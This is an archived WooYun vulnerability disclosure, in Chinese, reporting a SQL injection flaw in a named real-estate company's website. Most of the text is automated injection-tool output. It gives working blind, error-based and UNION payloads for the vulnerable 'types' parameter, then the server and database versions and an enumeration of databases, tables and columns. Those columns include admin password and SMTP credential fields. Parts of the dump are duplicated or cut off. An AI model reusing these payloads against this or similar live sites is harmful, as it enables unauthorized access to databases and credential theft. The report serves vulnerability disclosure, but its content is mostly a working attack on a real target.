乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-25: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-10-09: 厂商已经主动忽略漏洞,细节向公众公开
21世纪不动产地产SQL注入漏洞,
注入点:http://www.c21wuhan.com.cn/news.html?types=1
Parameter: types (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: types=1 AND 8602=8602 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: types=1 AND 2493=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2493=2493) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: types=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(120)+CHAR(100)+CHAR(69)+CHAR(121)+CHAR(90)+CHAR(69)+CHAR(105)+CHAR(109)+CHAR(108)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: ReportServerTempDB[9 tables]+-----------------------------------------------------+| ChunkData || ChunkSegmentMapping || ExecutionCache || PersistedStream || Segment || SegmentedChunk || SessionData || SessionLock || SnapshotData |+-----------------------------------------------------+Database: msdb[136 tables]+-----------------------------------------------------+| MSdatatype_mappings || MSdbms || MSdbms_datatype || MSdbms_datatype_mapping || MSdbms_map || backupfile || backupfilegroup || backupmediafamily || backupmediaset || backupset || log_shipping_monitor_alert Database: zjxh[2 tables]+-----------------------------------------------------+| AgentBlackList || Users |+-----------------------------------------------------+Database: Houses[106 tables]+-----------------------------------------------------+| Advertising || AdvertisingTypes || Agent || Area || Brand || BusinessCircle || CSBuilding || CSBuildingImage || CSRentalRoom || CSRentalRoomImage || CSSecondhandRoom || CSSecondhandRoomImage || City || DecorateTypes || Department || DepartmentImg || Disclaimer || EntrustInfo || FoundationInfo || Job || Link || News || NewsType || Position || PositionTypes || PropertyType || PropertyUse || Resume
Parameter: types (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: types=1 AND 8602=8602 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: types=1 AND 2493=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (2493=2493) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113))) Type: UNION query Title: Generic UNION query (NULL) - 13 columns Payload: types=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(77)+CHAR(120)+CHAR(100)+CHAR(69)+CHAR(121)+CHAR(90)+CHAR(69)+CHAR(105)+CHAR(109)+CHAR(108)+CHAR(113)+CHAR(107)+CHAR(120)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: ReportServerTempDBDatabase: zjxh[2 tables]+-----------------------------------------------------+| AgentBlackList || Users |+-----------------------------------------------------+Database: Houses[106 tables]+-----------------------------------------------------+| Advertising || AdvertisingTypes || Agent || Area || Brand || BusinessCircle || CSBuilding || CSBuildingImage || CSRentalRoom || CSRentalRoomImage || CSSecondhandRoom || CSSecondhandRoomImage || City || DecorateTypes || Department || DepartmentImg || Disclaimer || EntrustInfo || FoundationInfo || Job || Link || News || NewsType || Position || PositionTypes || PropertyType || PropertyUse || Resume || TowardTypes || View_Advertising || View_Agent || View_CSBuilding || View_Department || View_Disclaimer || View_EntrustInfo || View_FoundationInfo || View_Job || View_Link || View_News || View_Resume || View_WHBuilding || View_YCBuilding || View_answer || View_csczfandarea || View_csdepczf || View_csdeprsf || View_csrentalroom || View_csrsfAndarea || View_cssecondhandroom || View_czfAndarea || View_depczf || View_deprsf || View_info || View_infobigtype || View_infotype || View_lpnews || View_noywhb || View_print || View_question || View_quetionAndUser || View_rsfAndarea || View_wdsmalltype || View_whczflist || View_whdepczf || View_whdeprsf || View_whrentalroom || View_whrsflist || View_whsecodhandroom || View_ycczfandarea || View_ycdepczf || View_ycdeprsf || View_ycrentalroom || View_ycrsfAndarea || View_ycsecondhandroom || View_ywhb || View_ywhblog || WHBuilding || WHBuildingImage || WHRentalRoom || WHRentalRoomImage || WHSecondhandRoom || WHSecondhandRoomImage || YCBuilding || YCBuildingImage || YCRentalRoom || YCRentalRoomImage || YCSecondhandRoom || YCSecondhandRoomImage || answer || daikan || info || infobigtype || infotype || jylc || jylcmx |Database: JJDC1Table: manager66[33 columns]+-------------+----------+| Column | Type |+-------------+----------+| ADMIN | nvarchar || ads | nvarchar || banner | nvarchar || dateandtime | datetime || dc | nvarchar || gbook | nvarchar || gl_old | nvarchar || gonggao | nvarchar || house | nvarchar || hyedetail | nvarchar || hyetype | nvarchar || id | int || id_key | nvarchar || images | nvarchar || ip | nvarchar || jc | nvarchar || jj | nvarchar || job | nvarchar || link | nvarchar || member | nvarchar || name | nvarchar || newhouse | nvarchar || news | nvarchar || peigou | nvarchar || person | nvarchar || pingu | nvarchar || pinguren | nvarchar || pwd | nvarchar || Sphouse | nvarchar || Tjhouse | nvarchar || Tjrecomco | nvarchar || Type | nvarchar || Zs | nvarchar |+-------------+----------+Database: JJDC1Table: News[9 columns]+---------+----------+| Column | Type |+---------+----------+| Comment | ntext || DNT | datetime || FromW | nvarchar || hits | int || imgname | ntext || newsid | int || pl | int || sort | int || Topic | nvarchar |+---------+----------+Database: JJDC1Table: sz[4 columns]+----------+----------+| Column | Type |+----------+----------+| id | int || pass | nvarchar || smtp | nvarchar || smtpuser | nvarchar |+----------+----------+Database: JJDC1Table: Banner[7 columns]+------------+----------+| Column | Type |+------------+----------+| Bz | int || Deseriptor | nvarchar || hits | int || LinkId | int || Picurl | nvarchar || type1 | nvarchar || Web | nvarchar |+------------+----------+Database: JJDC1Table: gbook_back[4 columns]+-----------+----------+| Column | Type |+-----------+----------+| back_date | datetime || back_id | int || back_meno | ntext || id | int |+-----------+----------+Database: JJDC1Table: cyte[3 columns]+----------+----------+| Column | Type |+----------+----------+| cyte | nvarchar || cyteName | nvarchar || ID | int |+----------+----------+Database: JJDC1Table: Sp_movie[14 columns]+-------------+-----------+| Column | Type |+-------------+-----------+| ID | int || pic | nvarchar || Sp_add | nvarchar || Sp_company | nvarchar || Sp_content | ntext || Sp_datetime | datetime || Sp_Fax | nvarchar || Sp_mc | nvarchar || Sp_movie | ntext || Sp_Tel | nvarchar || Sp_time | nvarchar || Sp_Type | nvarchar || Sp_win | nvarchar || upsize_ts | timestamp |+-------------+-----------+Database: JJDC1Table: gonggao[4 columns]+-------------+----------+| Column | Type |+-------------+----------+| content | ntext || dateandtime | datetime || ggtext | nvarchar || id | int |+-------------+----------+Database: JJDC1Table: NewHouse[37 columns]+---------------+-----------+| Column | Type |+---------------+-----------+| Area | nvarchar || AvgPrice | float || BeginPrice | float || bimg | nvarchar || BusLine | ntext |eb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008Database: HousesTable: Advertising[21 entries]
过滤
未能联系到厂商或者厂商积极拒绝